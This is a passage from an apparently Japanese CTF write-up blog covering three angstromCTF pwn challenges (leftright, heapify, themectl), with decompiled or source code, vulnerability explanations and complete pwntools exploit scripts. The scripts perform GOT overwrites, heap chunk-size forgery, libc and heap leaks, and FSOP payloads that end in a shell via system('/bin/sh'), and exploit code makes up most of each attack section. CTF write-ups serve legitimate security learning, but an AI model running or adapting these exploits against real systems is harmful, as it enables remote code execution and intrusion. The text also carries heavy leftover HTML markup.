elf_name</span> =</span> "./chall.p"</span></span>
libc_name</span> =</span> "./libc.so.6"</span></span>
remote_addr, remote_port</span> =</span> "challs.actf.co 31323"</span>.split()</span></span>
if</span> libc_name:</span></span>
    libc:</span> ELF</span> =</span> ELF(libc_name)</span></span>
elf:</span> ELF</span> =</span> ELF(elf_name)</span></span>
script</span> =</span> """</span></span>
"""</span></span>
t</span> =</span> create_io()</span></span>
solve()</span></span></code></pre>[pwn] leftright</h1>
解析</h2>
[*] '/home/user/ctf/left_right/leftright'</span></span>
    Arch:     amd64-64-little</span></span>
    RELRO:    Partial RELRO</span></span>
    Stack:    Canary found</span></span>
    NX:       NX enabled</span></span>
    PIE:      PIE enabled</span></span></code></pre>
疑似コード</p>
int</span> __fastcall </span>main</span>(</span>int</span> argc</span>,</span> const char **</span>argv</span>,</span> const char **</span>envp</span>)</span></span>
{</span></span>
  const char *</span>v3;</span> // rdx</span></span>
  __int16 </span>*</span>v4;</span> // rax</span></span>
  __int16 v7;</span> // [rsp+2h] [rbp-2Eh]</span></span>
  int</span> select;</span> // [rsp+4h] [rbp-2Ch] BYREF</span></span>
  int</span> end;</span> // [rsp+8h] [rbp-28h]</span></span>
  int</span> i;</span> // [rsp+Ch] [rbp-24h]</span></span>
  char</span> s</span>[</span>24</span>];</span> // [rsp+10h] [rbp-20h] BYREF</span></span>
  unsigned</span> __int64 v12;</span> // [rsp+28h] [rbp-8h]</span></span>
</span>
  v12 </span>=</span> __readfsqword</span>(</span>0x</span>28</span>u</span>);</span></span>
  setbuf</span>(stdout,</span> 0</span>LL</span>);</span></span>
  printf</span>(</span>"Name: "</span>);</span></span>
  fgets</span>(s,</span> 15</span>, stdin);</span></span>
  v7 </span>=</span> 0</span>;</span></span>
  arr</span>[</span>0</span>]</span> =</span> 1</span>;</span></span>
  end </span>=</span> 0</span>;</span></span>
  while</span> (</span> !</span>end )</span></span>
  {</span></span>
    select </span>=</span> 0</span>;</span></span>
    __isoc99_scanf</span>(</span>"</span>%d</span>"</span>,</span> &</span>select);</span></span>
    getchar</span>();</span></span>
    if</span> ( select </span>==</span> 3</span> )</span></span>
    {</span></span>
      end </span>=</span> 1</span>;</span></span>
    }</span></span>
    else if</span> ( select </span><=</span> 3</span> )</span></span>
    {</span></span>
      if</span> ( select </span>==</span> 2</span> )</span></span>
      {</span></span>
        arr</span>[v7]</span> =</span> getchar</span>();</span></span>
      }</span></span>
      else</span></span>
      {</span></span>
        if</span> ( select )</span></span>
        {</span></span>
          if</span> ( select </span>!=</span> 1</span> )</span></span>
            goto</span> LABEL_14;</span></span>
        }</span></span>
        else</span></span>
        {</span></span>
          if</span> (</span> !</span>v7 )</span></span>
          {</span></span>
            puts</span>(</span>"hey!"</span>);</span></span>
            exit</span>(</span>1</span>);</span></span>
          }</span></span>
          --</span>v7;</span></span>
        }</span></span>
        ++</span>v7;</span></span>
      }</span></span>
    }</span></span>
LABEL_14:</span></span>
    for</span> ( i </span>=</span> 0</span>; i </span><=</span> 19</span>;</span> ++</span>i )</span></span>
    {</span></span>
      if</span> ( i )</span></span>
        v3 </span>=</span> (</span>const char *</span>)asc_2014;</span></span>
      else</span></span>
        v3 </span>=</span> (</span>const char *</span>)</span>&</span>unk_2013;</span></span>
      if</span> (</span> arr</span>[i] )</span></span>
        v4 </span>= &</span>asc_2014</span>[</span>1</span>];</span></span>
      else</span></span>
        v4 </span>= &</span>asc_2014</span>[</span>2</span>];</span></span>
      printf</span>(</span>"</span>%s%s</span>"</span>, (</span>const char *</span>)v4, v3);</span></span>
    }</span></span>
    putchar</span>(</span>10</span>);</span></span>
  }</span></span>
  puts</span>(</span>"bye"</span>);</span></span>
  puts</span>(s);</span></span>
  return</span> v12 </span>-</span> __readfsqword</span>(</span>0x</span>28</span>u</span>);</span></span>
}</span></span></code></pre>
グローバル変数arr</code>が存在して、arr[v7]</code>に任意の値を設定することができます。</p>
脆弱性</h2>
疑似コードのv7</code>は無限にインクリメントすることができます。つまり、Integer Overflowがあります。

__int16</code>であるため負数にすることができます。
arr[v7]</code>を(概ね)任意のアドレスにすることができるため、任意書き込みのプリミティブが得られます。</p>
攻撃</h2>
arr</code>の近く(アドレスがより低い方)にはGOTエントリが存在します。v7</code>
をOverflowさせてGOTエントリを書き換えることができます。 

具体的には、exit</code>を書き換えることで何度でもmainを呼び出せるようにします。加えて、puts</code>
がwhileループを抜けたあとにしか呼ばれないことを利用して、puts</code>のGOTエントリをprintf@plt</code>に書き換えることでputs(s)</code>
においてFSB脆弱性を発生させることができます。
\ 実際の攻撃手順は以下のとおりです。</p>

v7</code>をオーバーフローさせてexit</code>とputs</code>のGOTエントリをかきかえる。</li>
exit</code>を呼び出す(GOTの書き換えにより実際はmainを呼び出している)</li>
FSBを利用してlibc leak</li>
再びv7</code>をオーバーフローさせてputs</code>のGOTエントリをsystem</code>に書き換える</li>
puts(s)</code>がsystem('/bin/sh')</code>になり、シェルを取得</li>
</ol>
exploit</h2>
from</span> pwn</span> import *</span></span>
</span>
context.arch</span> =</span> "amd64"</span></span>
context.bits</span> =</span> 64</span></span>
context.terminal</span> =</span> "tmux splitw -h"</span>.split()</span></span>
context.log_level</span> =</span> "INFO"</span></span>
</span>
s2sh</span> = lambda</span> pl:</span> b</span>""</span>.join([p8(</span>int</span>(pl[i: i</span> +</span> 2</span>],</span> 16</span>))</span> for</span> i</span> in</span> range</span>(</span>0</span>,</span> len</span>(pl),</span> 2</span>)])</span></span>
s2u64</span> = lambda</span> s: u64(s.ljust(</span>8</span>,</span> b</span>"</span>\x00</span>"</span>))</span></span>
i2b</span> = lambda</span> x:</span> f</span>"</span>{</span>x</span>}</span>"</span>.encode()</span></span>
ptr_guard</span> = lambda</span> pos, ptr: (pos</span> >></span> 12</span>)</span> ^</span> ptr</span></span>
</span>
</span>
def</span> create_io</span>() -> tubes.tube.tube:</span></span>
    if not</span> local:</span></span>
        io: tubes.tube.tube</span> =</span> remote(remote_addr,</span> int</span>(remote_port))</span></span>
    elif</span> debug:</span></span>
        if</span> radare:</span></span>
            io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
            util.proc.wait_for_debugger(util.proc.pidof(io)[</span>0</span>])</span></span>
        else</span>:</span></span>
            io: tubes.tube.tube</span> =</span> gdb.debug([elf_name], script,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    else</span>:</span></span>
        io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    return</span> io</span></span>
</span>
</span>
def</span> solve</span>():</span></span>
    global</span> t</span></span>
    sa</span> = lambda</span> x, y: t.sendafter(x, y)</span></span>
    sla</span> = lambda</span> x, y: t.sendlineafter(x, y)</span></span>
    # overwrite exit -> main</span></span>
    t.sendline(</span>b</span>'/bin/sh</span>\x00</span>'</span>)</span></span>
    for</span> i</span> in</span> range</span>(</span>0x</span>ffff</span> &</span> (</span>~0x</span>78</span> +</span> 1</span>)):</span></span>
        t.sendline(</span>b</span>'1'</span>)</span></span>
        if</span> i</span> %</span> 1000</span> ==</span> 999</span>:</span></span>
            print</span>(</span>f</span>'</span>{</span>i</span>=</span>}</span>'</span>)</span></span>
            # time.sleep(0.5)</span></span>
            while</span> buf</span> :=</span> t.recv(</span>timeout</span>=</span>0.5</span>):</span></span>
                pass</span></span>
    t.sendline(</span>b</span>'2'</span>)</span></span>
    t.sendline(p8(</span>0x</span>76</span>))</span></span>
    for</span> _</span> in</span> range</span>(</span>0x</span>38</span>):</span></span>
        t.sendline(</span>b</span>'1'</span>)</span></span>
    t.sendline(</span>b</span>'2'</span>)</span></span>
    t.sendline(p8(</span>0x</span>b9</span>))</span></span>
    t.sendline(</span>b</span>'1'</span>)</span></span>
    t.sendline(</span>b</span>'2'</span>)</span></span>
    t.sendline(p8(</span>0x</span>11</span>))</span></span>
</span>
    for</span> _</span> in</span> range</span>(</span>0x</span>100</span> - 0x</span>c1</span>):</span></span>
        t.sendline(</span>b</span>'1'</span>)</span></span>
</span>
    while</span> True</span>:</span></span>
        if not</span> (buf</span> :=</span> t.recvn(</span>0x</span>10001</span>,</span> timeout</span>=</span>2</span>)):</span></span>
            break</span></span>
</span>
    if</span> debug:</span></span>
        input</span>(</span>"OK?"</span>)</span></span>
    # second main</span></span>
    t.sendline(</span>b</span>'0'</span>)</span></span>
    sla(</span>b</span>':'</span>,</span> b</span>'%41$p FIN'</span>)</span></span>
    t.sendline(</span>b</span>'3'</span>)</span></span>
    # exit main</span></span>
    buf</span> =</span> t.recvuntil(</span>b</span>'FIN'</span>)</span></span>
    buf</span> =</span> buf[buf.rfind(</span>b</span>'0x'</span>):buf.rfind(</span>b</span>' '</span>)]</span></span>
    print</span>(</span>f</span>'</span>{</span>buf</span>=</span>}</span>'</span>)</span></span>
    libc_base</span> =</span> int</span>(buf,</span> 16</span>)</span> -</span> 171584</span></span>
    libc.address</span> =</span> libc_base</span></span>
    print</span>(</span>f</span>"</span>{</span>libc_base</span>=:x</span>}</span>"</span>)</span></span>
</span>
    for</span> i</span> in</span> range</span>(</span>0x</span>ffff</span> &</span> (</span>~0x</span>78</span> +</span> 1</span>)):</span></span>
        t.sendline(</span>b</span>'1'</span>)</span></span>
        if</span> i</span> %</span> 2000</span> ==</span> 999</span>:</span></span>
            print</span>(</span>f</span>'</span>{</span>i</span>=</span>}</span>'</span>)</span></span>
            while</span> buf</span> :=</span> t.recv(</span>timeout</span>=</span>0.5</span>):</span></span>
                pass</span></span>
</span>
    for</span> i</span> in</span> p64(libc.sym[</span>'system'</span>]):</span></span>
        t.sendline(</span>b</span>'2'</span>)</span></span>
        t.sendline(p8(i))</span></span>
        t.sendline(</span>b</span>'1'</span>)</span></span>
</span>
    t.sendline(</span>b</span>'3'</span>)</span></span>
</span>
    t.interactive()</span></span>
</span>
</span>
local</span> =</span> 1</span></span>
debug</span> =</span> 1</span></span>
radare</span> =</span> 0</span></span>
</span>
elf_name</span> =</span> "./chall.p"</span></span>
libc_name</span> =</span> "./libc.so.6"</span></span>
remote_addr, remote_port</span> =</span> "challs.actf.co 31324"</span>.split()</span></span>
if</span> libc_name:</span></span>
    libc:</span> ELF</span> =</span> ELF(libc_name)</span></span>
</span>
while</span> True</span>:</span></span>
    elf:</span> ELF</span> =</span> ELF(elf_name)</span></span>
    script</span> =</span> """</span></span>
    """</span></span>
    t</span> =</span> create_io()</span></span>
    try</span>:</span></span>
        solve()</span></span>
    except</span>:</span></span>
        t.close()</span></span></code></pre>[pwn] heapify</h1>
解析</h2>
[*] '/home/user/ctf/left_right/chall.p'</span></span>
    Arch:     amd64-64-little</span></span>
    RELRO:    Partial RELRO</span></span>
    Stack:    Canary found</span></span>
    NX:       NX enabled</span></span>
    PIE:      PIE enabled</span></span></code></pre>
普通のメモアプリのようです。alloc</code>,delete</code>,view</code>が可能です。</p>
#include</span> <stdio.h></span></span>
#include</span> <stdlib.h></span></span>
#include</span> <unistd.h></span></span>
</span>
#define</span> N</span> 32</span></span>
</span>
int</span> idx </span>=</span> 0</span>;</span></span>
char *</span>chunks</span>[N];</span></span>
</span>
int</span> readint</span>() {</span></span>
	char</span> buf</span>[</span>0x</span>10</span>];</span></span>
	read</span>(</span>0</span>, buf,</span> 0x</span>10</span>);</span></span>
	return</span> atoi</span>(buf);</span></span>
}</span></span>
</span>
void</span> alloc</span>() {</span></span>
	if</span>(idx </span>>=</span> N) {</span></span>
		puts</span>(</span>"you've allocated too many chunks"</span>);</span></span>
		return</span>;</span></span>
	}</span></span>
	printf</span>(</span>"chunk size: "</span>);</span></span>
	int</span> size </span>=</span> readint</span>();</span></span>
	char *</span>chunk </span>=</span> malloc</span>(size);</span></span>
	printf</span>(</span>"chunk data: "</span>);</span></span>
</span>
	// ----------</span></span>
	// VULN BELOW !!!!!!</span></span>
	// ----------</span></span>
	gets</span>(chunk);</span></span>
	// ----------</span></span>
	// VULN ABOVE !!!!!!</span></span>
	// ----------</span></span>
</span>
	printf</span>(</span>"chunk allocated at index: </span>%d\n</span>"</span>, idx);</span></span>
	chunks</span>[idx</span>++</span>]</span> =</span> chunk;</span></span>
}</span></span>
</span>
void</span> delete</span>() {</span></span>
	printf</span>(</span>"chunk index: "</span>);</span></span>
	int</span> i </span>=</span> readint</span>();</span></span>
	if</span>(i </span>>=</span> N </span>||</span> i </span><</span> 0</span> || !</span>chunks</span>[i]) {</span></span>
		puts</span>(</span>"bad index"</span>);</span></span>
		return</span>;</span></span>
	}</span></span>
	free</span>(</span>chunks</span>[i]);</span></span>
	chunks</span>[i]</span> =</span> 0</span>;</span></span>
}</span></span>
</span>
void</span> view</span>() {</span></span>
	printf</span>(</span>"chunk index: "</span>);</span></span>
	int</span> i </span>=</span> readint</span>();</span></span>
	if</span>(i </span>>=</span> N </span>||</span> i </span><</span> 0</span> || !</span>chunks</span>[i]) {</span></span>
		puts</span>(</span>"bad index"</span>);</span></span>
		return</span>;</span></span>
	}</span></span>
	puts</span>(</span>chunks</span>[i]);</span></span>
}</span></span>
</span>
int</span> menu</span>() {</span></span>
	puts</span>(</span>"--- welcome 2 heap ---"</span>);</span></span>
	puts</span>(</span>"1) allocate"</span>);</span></span>
	puts</span>(</span>"2) delete"</span>);</span></span>
	puts</span>(</span>"3) view"</span>);</span></span>
}</span></span>
</span>
int</span> main</span>() {</span></span>
	setbuf</span>(stdout,</span> 0</span>);</span></span>
	menu</span>();</span></span>
	for</span>(;;) {</span></span>
		printf</span>(</span>"your choice: "</span>);</span></span>
		switch</span>(</span>readint</span>()) {</span></span>
		case</span> 1</span>:</span></span>
			alloc</span>();</span></span>
			break</span>;</span></span>
		case</span> 2</span>:</span></span>
			delete</span>();</span></span>
			break</span>;</span></span>
		case</span> 3</span>:</span></span>
			view</span>();</span></span>
			break</span>;</span></span>
		default</span>:</span></span>
			puts</span>(</span>"exiting"</span>);</span></span>
			return</span> 0</span>;</span></span>
		}</span></span>
	}</span></span>
}</span></span></code></pre>脆弱性</h2>
ソースコードにもわかりやすく書いてある通り、gets</code>が使われています。</p>
攻撃</h2>
chunkのサイズを偽造してすでに存在するチャンクにかぶせて新しくチャンクをallocすることで、view</code>を通したlibc、heap
leakができます。</p>

heapをalloc</li>
heapのサイズを偽造してunsorted binに繋ぐ</li>
libc, heapをleak</li>
FSOPでshellを取得</li>
</ol>
exploit</h2>
from</span> pwn</span> import *</span></span>
</span>
context.arch</span> =</span> "amd64"</span></span>
context.bits</span> =</span> 64</span></span>
context.terminal</span> =</span> "tmux splitw -h"</span>.split()</span></span>
context.log_level</span> =</span> "DEBUG"</span></span>
</span>
s2sh</span> = lambda</span> pl:</span> b</span>""</span>.join([p8(</span>int</span>(pl[i: i</span> +</span> 2</span>],</span> 16</span>))</span> for</span> i</span> in</span> range</span>(</span>0</span>,</span> len</span>(pl),</span> 2</span>)])</span></span>
s2u64</span> = lambda</span> s: u64(s.ljust(</span>8</span>,</span> b</span>"</span>\x00</span>"</span>))</span></span>
i2b</span> = lambda</span> x:</span> f</span>"</span>{</span>x</span>}</span>"</span>.encode()</span></span>
ptr_guard</span> = lambda</span> pos, ptr: (pos</span> >></span> 12</span>)</span> ^</span> ptr</span></span>
</span>
</span>
def</span> create_io</span>() -> tubes.tube.tube:</span></span>
    if not</span> local:</span></span>
        io: tubes.tube.tube</span> =</span> remote(remote_addr,</span> int</span>(remote_port))</span></span>
    elif</span> debug:</span></span>
        if</span> radare:</span></span>
            io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
            util.proc.wait_for_debugger(util.proc.pidof(io)[</span>0</span>])</span></span>
        else</span>:</span></span>
            io: tubes.tube.tube</span> =</span> gdb.debug([elf_name], script,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    else</span>:</span></span>
        io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    return</span> io</span></span>
</span>
</span>
def</span> solve</span>():</span></span>
    global</span> t, libc</span></span>
    sa</span> = lambda</span> x, y: t.sendafter(x, y)</span></span>
    sla</span> = lambda</span> x, y: t.sendlineafter(x, y)</span></span>
</span>
    def</span> alloc</span>(_size:</span> int</span>, _data:</span> bytes</span> =</span> ''</span>):</span></span>
        sla(</span>b</span>'choice:'</span>, i2b(</span>1</span>))</span></span>
        sla(</span>b</span>'size: '</span>, i2b(_size))</span></span>
        sla(</span>b</span>'data: '</span>, _data)</span></span>
</span>
    def</span> delete</span>(idx:</span> int</span>):</span></span>
        sla(</span>b</span>'choice:'</span>, i2b(</span>2</span>))</span></span>
        sla(</span>b</span>'index: '</span>, i2b(idx))</span></span>
</span>
    def</span> view</span>(idx:</span> int</span>) -></span> bytes</span>:</span></span>
        sla(</span>b</span>'choice:'</span>, i2b(</span>3</span>))</span></span>
        sla(</span>b</span>'index: '</span>, i2b(idx))</span></span>
        return</span> t.recvuntil(</span>b</span>'your '</span>)[:</span>-</span>5</span>]</span></span>
</span>
    alloc(</span>0x</span>28</span>)</span>  # 0</span></span>
    alloc(</span>0x</span>28</span>)</span>  # 1</span></span>
    alloc(</span>0x</span>1</span>)</span>  # 2</span></span>
    alloc(</span>0x</span>1</span>)</span>  # 3</span></span>
    alloc(</span>0x</span>3e0</span>)</span>  # 4</span></span>
    alloc(</span>0x</span>28</span>)</span>  # 5</span></span>
    delete(</span>1</span>)</span></span>
    alloc(</span>0x</span>28</span>, p8(</span>0</span>)</span> * 0x</span>28</span> +</span> p64(</span>0x</span>431</span>))</span></span>
    delete(</span>2</span>)</span></span>
    alloc(</span>0x</span>1</span>)</span>  # 6</span></span>
    libc_base</span> =</span> s2u64(view(</span>3</span>).splitlines()[</span>0</span>])</span> - 0x</span>21ace0</span></span>
    print</span>(</span>f</span>'</span>{</span>libc_base</span>=:x</span>}</span>'</span>)</span></span>
    alloc(</span>0x</span>1</span>)</span>  # 7</span></span>
    alloc(</span>0x</span>1</span>)</span>  # 8</span></span>
    delete(</span>4</span>)</span></span>
    heap_base</span> =</span> (s2u64(view(</span>9</span>).splitlines()[</span>0</span>])</span> -</span> 1</span>)</span> <<</span> 12</span></span>
    print</span>(</span>f</span>'</span>{</span>heap_base</span>=:x</span>}</span>'</span>)</span></span>
</span>
    libc.address</span> =</span> libc_base</span></span>
    fake_io</span> =</span> heap_base</span> + 0x</span>1770</span></span>
    payload</span> =</span> (</span></span>
            b</span>'/bin/sh</span>\x00</span>'</span>  # rdi</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 8</span></span>
            +</span> p64(</span>1</span>)</span>  # rcx (!=0)</span></span>
            +</span> p64(</span>2</span>)</span>  # rdx</span></span>
            +</span> p64(libc.sym[</span>"system"</span>])</span></span>
            +</span> p64(</span>1</span>)</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 4</span></span>
            +</span> p64(heap_base</span> + 0x</span>5000</span>)</span>  # writable area</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 2</span></span>
            +</span> p64(fake_io</span> + 0x</span>30</span>)</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 3</span></span>
            +</span> p64(</span>1</span>)</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 2</span></span>
            +</span> p64(libc.sym[</span>'_IO_wfile_jumps'</span>]</span> + 0x</span>30</span>)</span>  # _wide_data</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 6</span></span>
            +</span> p64(fake_io</span> + 0x</span>40</span>)</span></span>
    )</span></span>
    alloc(</span>0x</span>400</span>, payload)</span></span>
    alloc(</span>0x</span>3c0</span>, payload)</span></span>
</span>
    alloc(</span>0x</span>30</span>)</span>  # 12</span></span>
    alloc(</span>0x</span>30</span>)</span>  # 13</span></span>
    alloc(</span>0x</span>30</span>)</span>  # 14</span></span>
    delete(</span>14</span>)</span></span>
    delete(</span>13</span>)</span></span>
    delete(</span>12</span>)</span></span>
    IO_list_all</span> =</span> libc_base</span> + 0x</span>21b680</span></span>
    alloc(</span>0x</span>30</span>,</span> b</span>'A'</span> * 0x</span>38</span> +</span> p64(</span>0x</span>41</span>)</span> +</span> p64(ptr_guard(heap_base</span> + 0x</span>1bf0</span>,</span> IO_list_all</span>)))</span></span>
    alloc(</span>0x</span>30</span>)</span></span>
    alloc(</span>0x</span>30</span>, p64(fake_io))</span></span>
    sla(</span>b</span>'choice:'</span>, i2b(</span>0</span>))</span></span>
    t.interactive()</span></span>
</span>
</span>
local</span> =</span> 0</span></span>
debug</span> =</span> 1</span></span>
radare</span> =</span> 0</span></span>
</span>
elf_name</span> =</span> "./chall.p"</span></span>
libc_name</span> =</span> "./libc.so.6"</span></span>
remote_addr, remote_port</span> =</span> "challs.actf.co 31501"</span>.split()</span></span>
if</span> libc_name:</span></span>
    libc:</span> ELF</span> =</span> ELF(libc_name)</span></span>
elf:</span> ELF</span> =</span> ELF(elf_name)</span></span>
script</span> =</span> """</span></span>
"""</span></span>
t</span> =</span> create_io()</span></span>
solve()</span></span></code></pre>[pwn] themectl</h1>
解析</h2>
[*] '/home/user/ctf/themectl/chall.p'</span></span>
    Arch:     amd64-64-little</span></span>
    RELRO:    Full RELRO</span></span>
    Stack:    Canary found</span></span>
    NX:       NX enabled</span></span>
    PIE:      PIE enabled</span></span></code></pre>
プログラムの機能としてはユーザを作成しログインすることができ、それぞれのユーザが任意個のthemeを作成することができます。</p>
exploit</h2>
from</span> pwn</span> import *</span></span>
</span>
context.arch</span> =</span> "amd64"</span></span>
context.bits</span> =</span> 64</span></span>
context.terminal</span> =</span> "tmux splitw -h"</span>.split()</span></span>
context.log_level</span> =</span> "DEBUG"</span></span>
</span>
s2sh</span> = lambda</span> pl:</span> b</span>""</span>.join([p8(</span>int</span>(pl[i: i</span> +</span> 2</span>],</span> 16</span>))</span> for</span> i</span> in</span> range</span>(</span>0</span>,</span> len</span>(pl),</span> 2</span>)])</span></span>
s2u64</span> = lambda</span> s: u64(s.ljust(</span>8</span>,</span> b</span>"</span>\x00</span>"</span>))</span></span>
i2b</span> = lambda</span> x:</span> f</span>"</span>{</span>x</span>}</span>"</span>.encode()</span></span>
ptr_guard</span> = lambda</span> pos, ptr: (pos</span> >></span> 12</span>)</span> ^</span> ptr</span></span>
</span>
</span>
def</span> create_io</span>() -> tubes.tube.tube:</span></span>
    if not</span> local:</span></span>
        io: tubes.tube.tube</span> =</span> remote(remote_addr,</span> int</span>(remote_port))</span></span>
    elif</span> debug:</span></span>
        if</span> radare:</span></span>
            io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
            util.proc.wait_for_debugger(util.proc.pidof(io)[</span>0</span>])</span></span>
        else</span>:</span></span>
            io: tubes.tube.tube</span> =</span> gdb.debug([elf_name], script,</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    else</span>:</span></span>
        io: tubes.tube.tube</span> =</span> process([elf_name],</span> env</span>=</span>{</span>"LD_PRELOAD"</span>: libc_name})</span></span>
    return</span> io</span></span>
</span>
</span>
def</span> solve</span>():</span></span>
    global</span> t</span></span>
</span>
    def</span> sla</span>(x, y):</span></span>
        t.sendline(y)</span></span>
        time.sleep(</span>0.1</span>)</span></span>
</span>
    sa</span> = lambda</span> x, y: t.sendafter(x, y)</span></span>
</span>
    def</span> register</span>(username:</span> bytes</span>, passwd:</span> bytes</span>, num:</span> int</span>):</span></span>
        t.sendlineafter(</span>b</span>'>'</span>, i2b(</span>1</span>))</span></span>
        sla(</span>b</span>'name: '</span>, username)</span></span>
        sla(</span>b</span>'password: '</span>, passwd)</span></span>
        sla(</span>b</span>'like?'</span>, i2b(num))</span></span>
</span>
    def</span> login</span>(username:</span> bytes</span>, passwd:</span> bytes</span>):</span></span>
        t.sendlineafter(</span>b</span>'>'</span>, i2b(</span>2</span>))</span></span>
        sla(</span>b</span>'name: '</span>, username)</span></span>
        sla(</span>b</span>'password: '</span>, passwd)</span></span>
</span>
    def</span> edit</span>(idx:</span> int</span>, content:</span> bytes</span>):</span></span>
        t.sendlineafter(</span>b</span>'>'</span>, i2b(</span>1</span>))</span></span>
        sla(</span>b</span>'edit?'</span>, i2b(idx))</span></span>
        sla(</span>b</span>'idea: '</span>, content)</span></span>
</span>
    def</span> view</span>(idx:</span> int</span>) -></span> bytes</span>:</span></span>
        t.sendlineafter(</span>b</span>'>'</span>, i2b(</span>2</span>))</span></span>
        t.sendlineafter(</span>b</span>'view? '</span>, i2b(idx))</span></span>
        return</span> t.recvuntil(</span>b</span>'--- OPTIONS ---'</span>)[:</span>-</span>16</span>]</span></span>
</span>
    def</span> logout</span>():</span></span>
        sla(</span>b</span>'>'</span>, i2b(</span>4</span>))</span></span>
</span>
    register(</span>b</span>'A'</span>,</span> b</span>''</span>,</span> 0x</span>190</span>)</span></span>
    edit(</span>0</span>,</span> b</span>''</span>)</span></span>
    logout()</span></span>
    n</span> = 0x</span>c</span></span>
    register(</span>b</span>'B'</span>,</span> b</span>''</span>, n)</span></span>
    edit(</span>0</span>,</span> b</span>''</span>)</span></span>
    logout()</span></span>
    login(</span>b</span>'A'</span>,</span> b</span>''</span>)</span></span>
    edit(</span>0</span>,</span> b</span>'@'</span> * 0x</span>28</span> +</span> p64(n</span> *</span> 8</span> + 0x</span>11</span>)</span> +</span> p64(n))</span></span>
    logout()</span></span>
    login(</span>b</span>'B'</span>,</span> b</span>''</span>)</span></span>
    buf</span> =</span> view(</span>0</span>)</span></span>
    print</span>(</span>f</span>'</span>{</span>buf</span>=</span>}</span>'</span>)</span></span>
    heap_base</span> =</span> s2u64(buf)</span> - 0x</span>1120</span></span>
    print</span>(</span>f</span>'</span>{</span>heap_base</span>=:x</span>}</span>'</span>)</span></span>
</span>
    logout()</span></span>
    register(</span>b</span>'C'</span>,</span> b</span>''</span>,</span> 1</span>)</span></span>
    edit(</span>0</span>,</span> b</span>'A'</span> * 0x</span>28</span> +</span> p64(</span>0x</span>dd1</span>))</span></span>
    logout()</span></span>
    register(</span>b</span>'D'</span>,</span> b</span>''</span>,</span> 0x</span>e00</span> //</span> 8</span>)</span></span>
    logout()</span></span>
</span>
    libc_addr_ptr</span> =</span> heap_base</span> + 0x</span>12a0</span></span>
    login(</span>b</span>'A'</span>,</span> b</span>''</span>)</span></span>
    edit(</span>0</span>,</span> b</span>'@'</span> * 0x</span>28</span> +</span> p64(n</span> *</span> 8</span> + 0x</span>11</span>)</span> +</span> p64(n)</span> +</span> p64(libc_addr_ptr))</span></span>
    logout()</span></span>
    login(</span>b</span>'B'</span>,</span> b</span>''</span>)</span></span>
    libc_base</span> =</span> s2u64(view(</span>0</span>))</span> - 0x</span>21ace0</span></span>
    libc.address</span> =</span> libc_base</span></span>
    print</span>(</span>f</span>'</span>{</span>libc_base</span>=:x</span>}</span>'</span>)</span></span>
    logout()</span></span>
    login(</span>b</span>'A'</span>,</span> b</span>''</span>)</span></span>
    IO_list_all</span> =</span> libc_base</span> + 0x</span>21b680</span></span>
    edit(</span>0</span>,</span> b</span>'@'</span> * 0x</span>28</span> +</span> p64(n</span> *</span> 8</span> + 0x</span>11</span>)</span> +</span> p64(n)</span> +</span> p64(</span>IO_list_all</span>))</span></span>
    logout()</span></span>
    login(</span>b</span>'B'</span>,</span> b</span>''</span>)</span></span>
    fake_io</span> =</span> heap_base</span> + 0x</span>1210</span></span>
    edit(</span>0</span>, p64(fake_io))</span></span>
    logout()</span></span>
    login(</span>b</span>'C'</span>,</span> b</span>''</span>)</span></span>
    payload</span> =</span> (</span></span>
            b</span>'/bin/sh</span>\x00</span>'</span>  # rdi</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 8</span></span>
            +</span> p64(</span>1</span>)</span>  # rcx (!=0)</span></span>
            +</span> p64(</span>2</span>)</span>  # rdx</span></span>
            +</span> p64(libc.sym[</span>"system"</span>])</span></span>
            +</span> p64(</span>1</span>)</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 4</span></span>
            +</span> p64(heap_base</span> + 0x</span>5000</span>)</span>  # writable area</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 2</span></span>
            +</span> p64(fake_io</span> + 0x</span>30</span>)</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 3</span></span>
            +</span> p64(</span>1</span>)</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 2</span></span>
            +</span> p64(libc.sym[</span>'_IO_wfile_jumps'</span>]</span> + 0x</span>30</span>)</span>  # _wide_data</span></span>
            +</span> p64(</span>0</span>)</span> *</span> 6</span></span>
            +</span> p64(fake_io</span> + 0x</span>40</span>)</span></span>
    )</span></span>
    edit(</span>0</span>, payload)</span></span>
    logout()</span></span>
    sla(</span>b</span>'>'</span>, i2b(</span>3</span>))</span></span>
</span>
    t.interactive()</span></span>
</span>
</span>
local</span> =</span> 1</span></span>
debug</span> =</span> 1</span></span>
radare</span> =</span> 0</span></span>
</span>
elf_name</span> =</span> "./themectl"</span></span>
libc_name</span> =</span> "./libc.so.6"</span></span>
remote_addr, remote_port</span> =</span> "challs.actf.co 31325"</span>.split()</span></span>
if</span> libc_name:</span></span>
    libc:</span> ELF</span> =</span> ELF(libc_name)</span></span>
elf:</span> ELF</span> =</span> ELF(elf_name)</span></span>
script</span> =</span> """</span></span>
"""</span></span>
t</span> =</span> create_io()</span></span>
solve()</span></span></code></pre>


CakeCTF 2023
2023-11-19T00:00:00+00:00
CakeCTFにTPCとして参加しました。</p>


buckeyeCTF 2023
2023-10-02T00:00:00+00:00
BuckeyeCTF</a>に出場しました。
